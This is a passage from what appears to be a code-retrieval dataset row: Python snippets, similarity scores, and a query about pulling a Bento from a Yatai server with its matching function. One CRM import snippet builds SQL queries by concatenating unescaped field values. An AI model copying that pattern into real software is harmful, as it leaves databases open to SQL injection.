posting_pubkey = format(posting_key.get_public_key(), mph.prefix)\n if posting_pubkey in [\n x[0] for x in account[\"posting\"][\"key_auths\"]\n ]:\n print(\"Importing posting key!\")\n posting_privkey = posting_key.get_private_key()\n mph.wallet.addPrivateKey(posting_privkey)\n imported = True\n\n if \"memo\" in roles:\n memo_key = PasswordKey(account[\"name\"], password, role=\"memo\")\n memo_pubkey = format(memo_key.get_public_key(), mph.prefix)\n if memo_pubkey == account[\"memo_key\"]:\n print(\"Importing memo key!\")\n memo_privkey = memo_key.get_private_key()\n mph.wallet.addPrivateKey(memo_privkey)\n imported = True\n\n if not imported:\n print(\"No matching key(s) found. Password correct?\")",
"def import_datafile(db, infile):\n res = stat(infile)\n mtime = datetime.utcfromtimestamp(res.st_mtime)\n\n hash = md5hash(infile)\n\n data_file = db.model.data_file\n\n # Should maybe make sure error is not set\n rec = db.get(data_file, hash)\n # We are done if we've already imported\n if rec is not None:\n return False\n\n # Values to insert\n cols = dict(\n file_hash=hash,\n file_mtime=mtime,\n basename=infile.stem,\n csv_data=None)\n\n try:\n cols['csv_data'] = extract_datatable(infile)\n except NotImplementedError as e:\n secho(str(e), fg='red', dim=True)\n\n tbl = data_file.__table__\n sql = (insert(tbl)\n .values(file_path=str(infile), **cols)\n .on_conflict_do_update(\n index_elements=[tbl.c.file_path],\n set_=dict(**cols)))\n db.session.execute(sql)\n return True",
"def importFile(self):\n\n ## Backing up old CSV and JSON files before beginning import operations\n if os.path.isfile(\"text_files/customers.csv\") and os.path.isfile(\"text_files/customers.json\"):\n print(\"\\nCreating a backup of the existing customer .csv and .json files before overwriting\")\n shutil.copy2(\"text_files/customers.csv\", \"text_files/customers.csv.backup\" + str(time.time()))\n shutil.copy2(\"text_files/customers.json\", \"text_files/customers.json.backup\" + str(time.time()))\n\n ## Importing the text file for cleaning then converting to CSV\n input_file = open(\"text_files/customer_export.txt\", \"r\")\n output_file = open(\"text_files/customers.csv\", \"w\")\n\n ## A loop to clean and write the customer_export txt file to a CSV\n for line in input_file:\n clean_text = \"\"\n check_line = line.replace(\"#\", \"\").replace(\",,\",\"\").split(\"|\")\n for line in check_line:\n if line != check_line[10]:\n clean_text += line + \",\"\n elif line == check_line[10]:\n clean_text += line + \"\\n\"\n output_file.write(clean_text)\n\n ## Closing TXT file and CSV file after formatting\n input_file.close()\n output_file.close()\n\n ## Opening the cleaned CSV file for conversion to Json\n with open('text_files/customers.csv') as clean_csv:\n ## Converting CSV file to Json\n converted = csv.DictReader(clean_csv)\n rows = list(converted)\n\n ## Writing converted CSV to Json file\n with open('text_files/customers.json', 'w') as convert:\n json.dump(rows, convert)\n\n ## Deleting all data currently in database before importing new file\n db_connection.executeQuery(\"DELETE FROM CRM;DBCC CHECKIDENT ('CRM', RESEED, 0) DELETE FROM Mailings; DBCC CHECKIDENT ('Mailings', RESEED, 0) COMMIT\") \n\n ## Loading the newly created Json file\n with open(\"text_files/customers.json\") as customers_json:\n customers = json.load(customers_json)\n\n ## A loop to add the contents of the Json file to the database \n print(\"Writing imported file to database please wait...\")\n for key in customers:\n db_connection.executeQuery(\"INSERT INTO dbo.CRM (f_name, l_name, company, address, city, county, state, zip, primary_phone, secondary_phone, email_address) VALUES ('\" + key[\"first_name\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"last_name\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"company_name\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"address\"] + \"', '\" + key[\"city\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"county\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"state\"] + \"', '\" + str(key[\"zip\"]) + \"', '\" + key[\"phone1\"] + \"', '\" + key[\"phone2\"] + \"' , '\" + key[\"email\"] + \"'); COMMIT\")\n db_connection.executeQuery(\"INSERT INTO dbo.Mailings (name, company, address) VALUES ('\" + key[\"first_name\"].replace(\"\\'\", \"\\'\\'\") + \" \" + key[\"last_name\"].replace(\"\\'\", \"\\'\\'\") + \"', '\" + key[\"company_name\"].replace(\"\\'\", \"\\'\\'\") + \"','\" + key[\"address\"] + \" \" + key[\"city\"] + \" \" + key[\"county\"] + \" \" + key[\"state\"] + \" \" + str(key[\"zip\"]) + \"'); COMMIT\") \n\n print(\"\\nFinished writing to file. Returning to main menu...\")",
"def test_save_load(self):\n lib = archive([])\n f = io.StringIO()\n lib.save(f)\n f2 = io.StringIO(f.getvalue())\n lib2 = get_archive(f2)\n self.assertTrue(lib2)"
] | [
"0.6098828",
"0.6013871",
"0.5977933",
"0.58846664",
"0.5881364",
"0.5841038",
"0.57228506",
"0.56769913",
"0.5621053",
"0.56173635",
"0.5589252",
"0.55258936",
"0.5518586",
"0.5502786",
"0.54741645",
"0.5466958",
"0.545687",
"0.5419559",
"0.5372282",
"0.5365402",
"0.53363955",
"0.53265685",
"0.53158617",
"0.5307871",
"0.52951664",
"0.5284183",
"0.5268203",
"0.5259921",
"0.5199496",
"0.51926446",
"0.5182451",
"0.51743376",
"0.5166602",
"0.51228464",
"0.5114623",
"0.5111141",
"0.5095284",
"0.5092876",
"0.5091494",
"0.50857437",
"0.5082489",
"0.5081757",
"0.5081756",
"0.5073406",
"0.5072903",
"0.50599664",
"0.50454944",
"0.50182307",
"0.5013713",
"0.5001857",
"0.4982066",
"0.4954222",
"0.49528417",
"0.49214897",
"0.49176133",
"0.49161294",
"0.49022734",
"0.49011463",
"0.4897455",
"0.48935613",
"0.48855028",
"0.4885252",
"0.48801675",
"0.48795766",
"0.48794818",
"0.48690042",
"0.48539242",
"0.48484388",
"0.483954",
"0.4836835",
"0.48349655",
"0.48316735",
"0.4830181",
"0.48223636",
"0.4821072",
"0.48152065",
"0.48097154",
"0.48097154",
"0.48097154",
"0.479475",
"0.4793695",
"0.47793463",
"0.4775757",
"0.4770457",
"0.47680488",
"0.4746685",
"0.47370547",
"0.4727701",
"0.4721938",
"0.47115594",
"0.4710818",
"0.47095883",
"0.4708641",
"0.47068685",
"0.47055724",
"0.4695564",
"0.4695478",
"0.46791616",
"0.46741948",
"0.46738198"
] | 0.6817035 | 0 |
Pull Bento from a yatai server. | def pull(bento_tag: str, force: bool) -> None: # type: ignore (not accessed)
yatai_client.pull_bento(bento_tag, force=force) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"async def _pull(self) -> None:\n raise NotImplementedError()",
"def pull(self):",
"def _pull(self) -> None:\n raise NotImplementedError() # pragma: no cover",
"def pull_from_postmaster(self):\n # TODO: Assuming first server is good - need to make fallback logic\n return self.session.get_any(\"{base}{request_url}\".format(base=self.servers[0],\n request_url=F\"/Destiny2/Actions/Items/PullFromPostmaster/\"))",
"def get(self, bento_name, bento_version):",
"def make_pull(db,url):\n result = db.product_mstator.find_one({\"url\":url})\n return result",
"def fetch_pull(ref):\n origin.fetch(tags=True)\n repo.git.checkout(\"{}\".format(ref))\n repo.git.pull(\"origin\", \"{}\".format(ref))",
"def pull(self):\n origin = self.git_repo.remotes.origin\n origin.pull()",
"def pull(self):\n data = api.get(endpoint=self.endpoint, resource_id=self.id)\n self.__init__(**data)",
"async def _pull_now(self) -> None:\n raise NotImplementedError()",
"def pull(self, *arg, **kwds):\n pass",
"def pull_from_slave():\n print(\"Pulling from slave\")\n r = req.get(f\"{SLAVE_URL}/prepare_pull\")\n if r.status_code != req.codes.ok:\n print(\"Something wrong with slave on prepare pull\")\n print(r.text)\n return False\n print(\"Prepared\")\n try:\n for tname in TABLES:\n with open(f'{tname}.db', 'wb') as f:\n print(f\"Pulling {tname}\")\n r = req.post(f\"{SLAVE_URL}/pull_db/{tname}\", data={'key': HMA_KEY})\n if r.status_code != req.codes.ok:\n print(\"Something went wrong\")\n print(r.text)\n return False\n f.write(r.content)\n return True\n except IOError:\n print(\"IO ERROR\")\n return False",
"def pull(self):\n data = api.get(endpoint=self.endpoint, resource_id=self.slug)\n self.__init__(**data)",
"def pull():\n _with_deploy_env(['git pull'])",
"def pull(self):\n run('git', 'pull', 'origin', 'master')",
"def pull(self, remote, branch, *args):\n return self.cmd('pull', remote, branch, *args)",
"def pull(self, *args, **kwargs) -> Any:\n raise NotImplementedError",
"async def async_update(self):\n try:\n self._data = requests.get(self._build_url(), timeout=10, headers={'accept-encoding': None}).json()\n _LOGGER.debug(\"TOON fetched data = %s\", self._data)\n except (requests.exceptions.RequestException) as error:\n _LOGGER.error(\"Unable to connect to TOON: %s\", error)\n self._data = None",
"def pull(self, verbose=True):\n fetch_cmd = [\"git\", \"fetch\"]\n if not verbose:\n fetch_cmd.append(\"-q\")\n subprocess.call(fetch_cmd, cwd=self.path)\n checkout_cmd = [\"git\", \"checkout\", \"origin/master\", \"-B\", \"master\"]\n if not verbose:\n checkout_cmd.append(\"-q\")\n return subprocess.call(checkout_cmd, cwd=self.path)",
"def remote_pull(*keys):",
"def test_pull_from_origin(tmpdir):\n gitwrapper.clone_from('git://github.com/Tinche/bower-cache', tmpdir)\n gitwrapper.pull_from_origin(tmpdir)",
"def bzpull(request, target):\n if target.startswith(\"sha1:\"):\n target = target[5:]\n url = \"http://bitzi.com/lookup/%s?v=tventtxt\" % target\n tventtxt = urllib.urlopen(url)\n tventdict = {}\n targets_to_update = set()\n count = 0\n text = \"\"\n try:\n for line in tventtxt:\n text += '\\n'\n line = line.strip()\n text += line\n if not line:\n if 'user' in tventdict and 'target_id' in tventdict and 'when' in tventdict:\n tvent = Tvent()\n tvent.when = tventdict['when']\n tvent.user = tventdict['user']\n target, created = Target.objects.get_or_create(id=tventdict['target_id'])\n tvent.target = target\n targets_to_update.add(target.id)\n tvent.tagtext = tventdict['tagtext']\n tvent.save()\n count += 1\n else:\n # error; required field not present\n text += '\\nERROR: incomplete tvent ' + str(tventdict)\n tventdict = {}\n continue\n if line.startswith(\"=\"):\n tventdict['when'] = line[1:]\n continue\n if line.startswith(\"~\"):\n tventdict['user'] = line[1:]\n continue\n if line.startswith(\"@\"):\n tventdict['target_id'] = line[1:]\n continue\n tventdict['tagtext'] = tventdict.get('tagtext','') + line + '\\n'\n if 'user' in tventdict and 'target_id' in tventdict and 'when' in tventdict:\n # TODO: reduce duplication with above\n tvent = Tvent()\n tvent.when = tventdict['when']\n tvent.user = tventdict['user']\n target = Target.objects.get_or_create(id=tventdict['target_id'])\n tvent.target = target\n targets_to_update.add(target.id)\n # TODO: cleanup tags here? \n tvent.save()\n count += 1\n else:\n # error; required field not present\n text += '\\nERROR: incomplete tvent ' + str(tventdict)\n finally:\n tventtxt.close()\n # trigger update of any possibly-changed Target summaries\n for id in targets_to_update:\n Target.objects.get(id=id).updateFromTvents()\n return HttpResponse('Pulled %d tvents from: %s\\n %s' % (count, url, text), mimetype='text/plain')",
"def pull(self):\n raise NotImplementedError()",
"def pull(args):\n cache = set(args.remote_cache).union(set(args.cache))\n for path in sorted(cache):\n if not os.path.exists(os.path.join(args.base, path)) and remote_exists(args.sftp, os.path.join(args.remote_base, path)):\n print('pull: {}'.format(path))\n ensure_local(os.path.dirname(os.path.join(args.base, path)))\n args.sftp.get(\n os.path.join(args.remote_base, path),\n os.path.join(args.base, path)\n )\n args.cache.append(path)\n args.update = True\n return",
"def pull():\n am = AccountManager(get_settings())\n am.pull_all()",
"def d_ploy():\n\tlocal(\"git push origin --all\")\n\twith cd(LIVE_ROOT):\n\t\trun(\"git pull\")",
"def local_bonds_prices():\n url1 = \"https://api.invertironline.com/token\"\n\n data = {\n \"username\": usuario,\n \"password\": password,\n \"grant_type\": \"password\" \n }\n response = requests.post(url1, data=data)\n if response.status_code == 200:\n content = response.text\n access_key = token_key(content)\n\n url2 = f'https://api.invertironline.com/api/v2/Cotizaciones/Bonos/Merval/argentina'\n datos = requests.get(url2, headers={\n 'Authorization': 'Bearer '+access_key\n })\n datos = json.loads(datos.text)\n datos = datos['titulos']\n datos = clean_assets(datos)\n return datos",
"def pull1(repo, **kwargs):\n ret = do_pull(repo, \"topology.virl\")\n if not ret:\n exit(1)",
"def _fetch_remote(self, dqueue, server, url, timeout):\n try:\n req = requests.get(url, timeout=timeout)\n if req.status_code == 200:\n try:\n resp_params = parse_sync_response(req.text)\n dqueue.put({'server': server, 'params': resp_params})\n except ValueError as err:\n logger.error('Failed to parse response of %s: %s', server, err)\n else:\n logger.warning('Recieved status code %s for %s', req.status_code, url)\n except Exception as err:\n logger.warning('Failed to retrieve %s: %s', url, err)",
"def download_stewicombo_from_remote(name):\n meta = set_stewicombo_meta(name, category='')\n log.info(f'attempting download of {name} from {paths.remote_path}')\n download_from_remote(meta, paths)",
"async def fetch_get(self, command, data):\n _LOGGER.debug(\"[Foobar2k] Running fetch GET\")\n async with self._session.get(\"{base_url}{command}\".format(\n base_url=self._base_url, command=command), data=data) as resp_obj:\n response = await resp_obj.text()\n if (resp_obj.status == 200 or resp_obj.status == 204):\n _LOGGER.debug(\"[Foobar2k] Have a response\")\n return response\n else:\n _LOGGER.error(f\"Host [{self._host}] returned HTTP status code [{resp_obj.status}] to GET command at \"\n \"end point [{command}]\")\n return None",
"def _pull_now(self) -> None:\n raise NotImplementedError()",
"def fetch(self, remote, *args):\n return self.cmd('fetch', remote, *args)",
"def _pullbundle2(pullop):\n kwargs = {b'bundlecaps': caps20to10(pullop.repo, role=b'client')}\n\n # make ui easier to access\n ui = pullop.repo.ui\n\n # At the moment we don't do stream clones over bundle2. If that is\n # implemented then here's where the check for that will go.\n streaming = streamclone.canperformstreamclone(pullop, bundle2=True)[0]\n\n # declare pull perimeters\n kwargs[b'common'] = pullop.common\n kwargs[b'heads'] = pullop.heads or pullop.rheads\n\n # check server supports narrow and then adding includepats and excludepats\n servernarrow = pullop.remote.capable(wireprototypes.NARROWCAP)\n if servernarrow and pullop.includepats:\n kwargs[b'includepats'] = pullop.includepats\n if servernarrow and pullop.excludepats:\n kwargs[b'excludepats'] = pullop.excludepats\n\n if streaming:\n kwargs[b'cg'] = False\n kwargs[b'stream'] = True\n pullop.stepsdone.add(b'changegroup')\n pullop.stepsdone.add(b'phases')\n\n else:\n # pulling changegroup\n pullop.stepsdone.add(b'changegroup')\n\n kwargs[b'cg'] = pullop.fetch\n\n legacyphase = b'phases' in ui.configlist(b'devel', b'legacy.exchange')\n hasbinaryphase = b'heads' in pullop.remotebundle2caps.get(b'phases', ())\n if not legacyphase and hasbinaryphase:\n kwargs[b'phases'] = True\n pullop.stepsdone.add(b'phases')\n\n if b'listkeys' in pullop.remotebundle2caps:\n if b'phases' not in pullop.stepsdone:\n kwargs[b'listkeys'] = [b'phases']\n\n bookmarksrequested = False\n legacybookmark = b'bookmarks' in ui.configlist(b'devel', b'legacy.exchange')\n hasbinarybook = b'bookmarks' in pullop.remotebundle2caps\n\n if pullop.remotebookmarks is not None:\n pullop.stepsdone.add(b'request-bookmarks')\n\n if (\n b'request-bookmarks' not in pullop.stepsdone\n and pullop.remotebookmarks is None\n and not legacybookmark\n and hasbinarybook\n ):\n kwargs[b'bookmarks'] = True\n bookmarksrequested = True\n\n if b'listkeys' in pullop.remotebundle2caps:\n if b'request-bookmarks' not in pullop.stepsdone:\n # make sure to always includes bookmark data when migrating\n # `hg incoming --bundle` to using this function.\n pullop.stepsdone.add(b'request-bookmarks')\n kwargs.setdefault(b'listkeys', []).append(b'bookmarks')\n\n # If this is a full pull / clone and the server supports the clone bundles\n # feature, tell the server whether we attempted a clone bundle. The\n # presence of this flag indicates the client supports clone bundles. 
This\n # will enable the server to treat clients that support clone bundles\n # differently from those that don't.\n if (\n pullop.remote.capable(b'clonebundles')\n and pullop.heads is None\n and list(pullop.common) == [pullop.repo.nullid]\n ):\n kwargs[b'cbattempted'] = pullop.clonebundleattempted\n\n if streaming:\n pullop.repo.ui.status(_(b'streaming all changes\\n'))\n elif not pullop.fetch:\n pullop.repo.ui.status(_(b\"no changes found\\n\"))\n pullop.cgresult = 0\n else:\n if pullop.heads is None and list(pullop.common) == [pullop.repo.nullid]:\n pullop.repo.ui.status(_(b\"requesting all changes\\n\"))\n if obsolete.isenabled(pullop.repo, obsolete.exchangeopt):\n remoteversions = bundle2.obsmarkersversion(pullop.remotebundle2caps)\n if obsolete.commonversion(remoteversions) is not None:\n kwargs[b'obsmarkers'] = True\n pullop.stepsdone.add(b'obsmarkers')\n _pullbundle2extraprepare(pullop, kwargs)\n\n remote_sidedata = bundle2.read_remote_wanted_sidedata(pullop.remote)\n if remote_sidedata:\n kwargs[b'remote_sidedata'] = remote_sidedata\n\n with pullop.remote.commandexecutor() as e:\n args = dict(kwargs)\n args[b'source'] = b'pull'\n bundle = e.callcommand(b'getbundle', args).result()\n\n try:\n op = bundle2.bundleoperation(\n pullop.repo, pullop.gettransaction, source=b'pull'\n )\n op.modes[b'bookmarks'] = b'records'\n bundle2.processbundle(pullop.repo, bundle, op=op)\n except bundle2.AbortFromPart as exc:\n pullop.repo.ui.error(_(b'remote: abort: %s\\n') % exc)\n raise error.RemoteError(_(b'pull failed on remote'), hint=exc.hint)\n except error.BundleValueError as exc:\n raise error.RemoteError(_(b'missing support for %s') % exc)\n\n if pullop.fetch:\n pullop.cgresult = bundle2.combinechangegroupresults(op)\n\n # processing phases change\n for namespace, value in op.records[b'listkeys']:\n if namespace == b'phases':\n _pullapplyphases(pullop, value)\n\n # processing bookmark update\n if bookmarksrequested:\n books = {}\n for record in op.records[b'bookmarks']:\n books[record[b'bookmark']] = record[b\"node\"]\n pullop.remotebookmarks = books\n else:\n for namespace, value in op.records[b'listkeys']:\n if namespace == b'bookmarks':\n pullop.remotebookmarks = bookmod.unhexlifybookmarks(value)\n\n # bookmark data were either already there or pulled in the bundle\n if pullop.remotebookmarks is not None:\n _pullbookmarks(pullop)",
"async def pull(self) -> None:\n pull_fun = getattr(self, '_pull')\n if inspect.iscoroutinefunction(pull_fun):\n await pull_fun()\n return\n await run_sync(pull_fun)",
"def do_pull_file(dbsync, bibkey):\n pass",
"def pull(repo, **kwargs):\n ret = do_pull(repo, \"topology.yaml\")\n if not ret:\n ret = do_pull(repo, \"topology.virl\")\n if not ret:\n exit(1)",
"def pull(self, **kwargs):\n return _taskpipeoperation(self,'pull', **kwargs)",
"def retrieve_update(self, apikey):\n\n # Get the full url to use\n url = SB_URL_TEMPLATE % (apikey, self.get_version_string())\n self.log.debug(\"Grabbing from url: %s\" % url)\n\n # Grab the blacklist\n try:\n if self.proxy:\n self.log.debug(\"Updating with proxy: %s\" % self.proxy)\n proxy_support = urllib2.ProxyHandler({\"http\" : self.proxy})\n opener = urllib2.build_opener(proxy_support)\n urllib2.install_opener(opener)\n return urllib2.urlopen(url,timeout=TIMEOUT)\n #return self._local_fopen(url) # for testing only\n except urllib2.URLError, e:\n if hasattr(e, \"reason\"):\n self.log.error(e.reason)\n raise SafeBrowsingUpdateError(e.reason)\n elif hasattr(e, \"code\"):\n self.log.error(str(e))\n raise SafeBrowsingUpdateError(str(e))",
"def update():\n call('git -C ~/norminette+ pull', shell=True)",
"def test_pull2(self):\n\n # Use defaults for format, arch, os, ostcount, replication\n pr = self.pull\n # Do the pull\n session = self.mtm.new_session(self.auth, self.system)\n rec1 = self.mtm.pull(session, pr) # ,delay=False)\n pr['tag'] = self.tag2\n rec2 = self.mtm.pull(session, pr) # ,delay=False)\n self.assertIsNotNone(rec1)\n id1 = rec1['_id']\n self.assertIsNotNone(rec2)\n id2 = rec2['_id']\n # Confirm record\n q = {'system': self.system, 'itype': self.itype, 'pulltag': self.tag}\n mrec = self.images.find_one(q)\n self.assertIn('_id', mrec)\n state = self.time_wait(id1)\n self.assertEqual(state, 'READY')\n state = self.time_wait(id2)\n self.assertEqual(state, 'READY')\n mrec = self.images.find_one(q)\n self.images.drop()",
"async def pull(ctx):\n author = ctx.author\n if author.id in authorities:\n out = subprocess.Popen(['git', 'pull'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n stdout,stderr = out.communicate()\n stdout = stdout.decode(\"utf-8\")\n msg = '**Output: **{0}\\n'.format(stdout)\n if stderr:\n stderr = stderr.decode(\"utf-8\")\n msg += '**Error: **\\n{0}'.format(stderr)\n await ctx.send(msg)\n else:\n await ctx.send(\"You can't tell me what to do!\")",
"def get(self):\n url = \"http://twitter.com/statuses/public_timeline.json\"\n task = taskqueue.Task(\n url='/tasks/fetch',\n params={'url': url}\n )\n task.add('fetch')",
"def force_pull(self):\n return self._force_pull",
"def pull(self, data):\n required = {'token', 'source'}\n api.validate(data, required)\n token = data['token']\n repo = data['source']\n self.credentials_module.authorize(token)\n result = self.docker_module.pull_image(repo)\n # credentials_module.add_image(token, result['image_id'])\n return result",
"def assets_pull(ctx, text, method):\n ocean = ctx.obj['ocean']\n response = []\n for did in ocean.search(text):\n print('pulling:', did)\n response += [ctx.invoke(assets_consume,\n did=did,\n method=method)]",
"def fetch(self, remote: str, branch: str) -> str:\n self.__verify_repo_initialized()\n address = heads.get_remote_address(self._env.branchenv, name=remote)\n self._client = HangarClient(envs=self._env, address=address)\n CW = ContentWriter(self._env)\n\n with closing(self._client) as client:\n client: HangarClient\n\n # ----------------- setup / validate operations -------------------\n\n try:\n cHEAD = heads.get_branch_head_commit(self._env.branchenv, branch)\n except ValueError:\n # branch does not exist on local client\n try:\n s_branch = client.fetch_branch_record(branch)\n sHEAD = s_branch.rec.commit\n except grpc.RpcError as rpc_error:\n if rpc_error.code() == grpc.StatusCode.NOT_FOUND:\n # branch does not exist on remote\n logger.error(rpc_error.details())\n raise rpc_error\n else:\n c_bhistory = summarize.list_history(\n self._env.refenv, self._env.branchenv, branch_name=branch)\n try:\n s_branch = client.fetch_branch_record(branch)\n sHEAD = s_branch.rec.commit\n except grpc.RpcError as rpc_error:\n if rpc_error.code() == grpc.StatusCode.NOT_FOUND:\n # branch does not exist on remote\n logger.error(rpc_error.details())\n raise rpc_error\n\n # verify histories are intact and should be synced\n if sHEAD == cHEAD:\n warnings.warn(f'NoOp: {sHEAD} == client HEAD {cHEAD}', UserWarning)\n return branch\n elif sHEAD in c_bhistory['order']:\n warnings.warn(\n f'REJECTED: remote HEAD: {sHEAD} behind local: {cHEAD}', UserWarning)\n return branch\n\n # ------------------- get data ------------------------------------\n\n mCmtResponse = client.fetch_find_missing_commits(branch)\n m_cmts = mCmtResponse.commits\n for commit in tqdm(m_cmts, desc='fetching commit data refs'):\n # Get missing label (metadata) digest & values\n m_labels = set(client.fetch_find_missing_labels(commit))\n for label in m_labels:\n received_hash, labelVal = client.fetch_label(label)\n CW.label(received_hash, labelVal)\n # Get missing data schema digests & values\n mSchemaResponse = client.fetch_find_missing_schemas(commit)\n for schema in mSchemaResponse.schema_digests:\n schema_hash, schemaVal = client.fetch_schema(schema)\n CW.schema(schema_hash, schemaVal)\n # Record missing data hash digests (does not get data itself)\n m_hashes = client.fetch_find_missing_hash_records(commit)\n m_schema_hash_map = defaultdict(list)\n for digest, schema_hash in m_hashes:\n m_schema_hash_map[schema_hash].append((digest, schema_hash))\n for schema_hash, received_data in m_schema_hash_map.items():\n CW.data(schema_hash, received_data, backend='50')\n\n # Get missing commit reference specification\n for commit in tqdm(m_cmts, desc='fetching commit spec'):\n cmt, parentVal, specVal, refVal = client.fetch_commit_record(commit)\n CW.commit(cmt, parentVal, specVal, refVal)\n\n # --------------------------- At completion -----------------------\n\n # Update (or create) remote branch pointer with new HEAD commit\n fetchBranchName = f'{remote}/{branch}'\n try:\n heads.create_branch(\n self._env.branchenv, name=fetchBranchName, base_commit=sHEAD)\n except ValueError:\n heads.set_branch_head_commit(\n self._env.branchenv, branch_name=fetchBranchName, commit_hash=sHEAD)\n\n return fetchBranchName",
"def pull(connection, rid=None, repo=None):\n\n if repo is None:\n repo = Repository(connection, rid)\n\n return repo.pull()",
"def pull_data(stop_event):\r\n logger = logging.getLogger(__name__)\r\n\r\n # List of current formats supported\r\n currency_list = ['https://www.bitstamp.net/api/v2/ticker_hour/btceur', 'https://www.bitstamp.net/api/v2/ticker_hour/btcusd',\r\n 'https://www.bitstamp.net/api/v2/ticker_hour/ethusd', 'https://www.bitstamp.net/api/v2/ticker_hour/etheur']\r\n\r\n # Loop until told otherwise!\r\n while not stop_event.is_set():\r\n for currency in currency_list:\r\n res = requests.get(currency)\r\n try:\r\n res.raise_for_status()\r\n except requests.exceptions.HTTPError as e:\r\n # Not 200\r\n logger.error(str(e))\r\n continue\r\n\r\n # Get the end characters to dertermine the type e.g. btceur, ethusd, etc...\r\n currency_type = (currency.rpartition('/')[-1])\r\n logger.info('The Curreny type: ' + currency_type)\r\n\r\n if currency_type == 'btceur':\r\n table = 'btceur'\r\n elif currency_type == 'btcusd':\r\n table = 'btcusd'\r\n elif currency_type == 'ethusd':\r\n table = 'ethusd'\r\n elif currency_type == 'etheur':\r\n table = 'etheur'\r\n else:\r\n table = None\r\n\r\n # Extract Data and Fields\r\n data = res.json()\r\n field_list = data.keys()\r\n logger.info(field_list)\r\n value_list = data.values()\r\n logger.info(value_list)\r\n\r\n # Write to DB\r\n db_commit(table, field_list, value_list)\r\n # Cannot make more than 600 requests per 10 minutes or they will ban your IP address.\r\n # Will in time get real time using their websocket API.\r\n time.sleep(5)",
"def pull(\n self,\n source: Optional[Path] = None,\n destination: Optional[Path] = None,\n options: Optional[List[str]] = None,\n extend_options: Optional[List[str]] = None) -> None:\n if not self.is_ready:\n return",
"def fetch(self) -> None:\n pass",
"def fetch(args):\n do_all_projects_remotes(args + [\"fetch\"])",
"def Pull(self):\n self.response = [stdin.readline()[:-1] for i in range(self.market_number)]\n if len(self.response[0]) == 0:\n self.response = None\n return\n for i in range(self.market_number):\n self.price[self.response[i].split(\":\")[0]].insert(0, float(self.response[i].split(\":\")[1]))\n if len(self.price[self.response[i].split(\":\")[0]]) > self.period:\n self.price[self.response[i].split(\":\")[0]].pop()\n if self.response[i].split(\":\")[0] == self.little_name:\n self.little.insert(0, float(self.response[i].split(\":\")[1]))\n if len(self.little) > self.period:\n self.little.pop()",
"def fetch(self):\n pass",
"def fetch(self):\n pass",
"def main():\n get_obofoundry(force_download=True)",
"def get_latest_data():\n try:\n print '\\nRequesting new data.....\\n'\n response = get(\"https://api.myjson.com/bins/2csub\")\n if response.status_code is 200:\n print '\\nSuccess (200) in downloading data\\n'\n current_json = response.json()\n set_backup_data(current_json)\n else: \n current_json = get_backup_data()\n except ConnectionError:\n current_json = get_backup_data()\n return current_json",
"def do_pull(self, arg):\n checkLocalGitLocation()\n teamorindividual = input(\"Is this a team or individual (t or i):\")\n if teamorindividual == 'i':\n for student in returnAllStudents():\n os.system(\"cd %s && git pull https://github.ccs.neu.edu/%s && cd ..\" %\n (localgitlocation, 'cs5500/' + student))\n else:\n for team in returnAllTeams():\n os.system(\"cd %s && git pull https://github.ccs.neu.edu/%s/%s && cd ..\" %\n (localgitlocation + '/' + team, githuborg, team))",
"def fetch_the_data():\n subprocess.run([\"wget\", \"https://storage.googleapis.com/recipe-box/recipes_raw.zip\"])\n subprocess.run([\"unzip\", \"recipes_raw.zip\", \"-d\", RECIPES_DIRPATH])\n subprocess.run([\"rm\", \"recipes_raw.zip\"])",
"def pull2(repo, overwrite=True):\n cmd = 'git pull --no-edit'\n out = repo.issue(cmd, error='return')\n if overwrite and out is not None:\n repo._handle_overwrite_error(out)\n # Retry\n repo.issue(cmd)",
"def pull(targets, *keys):",
"def download():\n toydata = requests.get(DATA_URL).json()\n return toydata",
"def do_GET(self):\n print(\"do_GET: got: \" + str(self.path))\n path_split = self.path.split(\"/\", 2) # ['', 'hello', 'nikolay/uuuuer']\n username = path_split[-1] # nikolay/uuuuer\n print(\"do_GET: Let's open db_conn\")\n connection = db_open()\n birth_date = db_select(username, connection)\n db_close(connection)\n\n days_until_bday = get_days_to_bday(birth_date)\n json_obj = http_construct_json(username, days_until_bday)\n\n self.http_send_reply(json_obj)\n print(\"do_GET: DONE! \\n\")",
"def git_pull(where=None):\n config = get_config(where)\n with settings(host_string=config['host_string']), cd(config['installation_dir']):\n run('git pull')\n run('git submodule update')\n collectstatic(where)\n restart(where)",
"def do_GET(self):\n f = self.send_head()\n if f:\n try:\n \n self.copyfile(f, self.wfile)\n finally:\n f.close()",
"def get_pulls(self):\n url = self.base_url + 'pulls'\n\n req = requests.get(headers=self.headers, url=url)\n\n return req.json()",
"def handle_get(self, api, command):\n return self._make_request_from_command('GET', command)",
"async def source(self, context):\n await context.channel.send(\"https://github.com/balfroim/TengriBOT\")",
"def do_fetch(self):\n pass",
"def call_git_pull():\n print(\"This will pull the remote repo and overwrite the local notes\")\n call([\"git\", \"pull\"])",
"def do_GET(self):\r\n f = self.send_head()\r\n if f:\r\n self.copyfile(f, self.wfile)\r\n f.close()",
"def pull(self) -> List[DemoBinaryPassenger]:\n output = []\n passenger1 = DemoBinaryPassenger()\n passenger1.external_id = \"ID_BIN_1\"\n passenger1.source_system = \"DEMO_SYSTEM\"\n passenger1.puller_module = self.__module__\n passenger1.attachments.append(Attachment(\n p_name=DemoBinaryPuller._BIN_FILE_NAME,\n p_format=AttachmentFormat.binary,\n p_binary_content=DemoBinaryPuller._get_sample_binary()))\n output.append(passenger1)\n self.log.append_text(\"Got passenger \" + passenger1.id_text)\n return output",
"def fetchall(self):\n try:\n self.repo.remotes.origin.fetch()\n except git.exc.GitCommandError as err:\n raise GitError(err)",
"def __gitFetch(self):\n self.vcs.gitFetch(self.project.getProjectPath())",
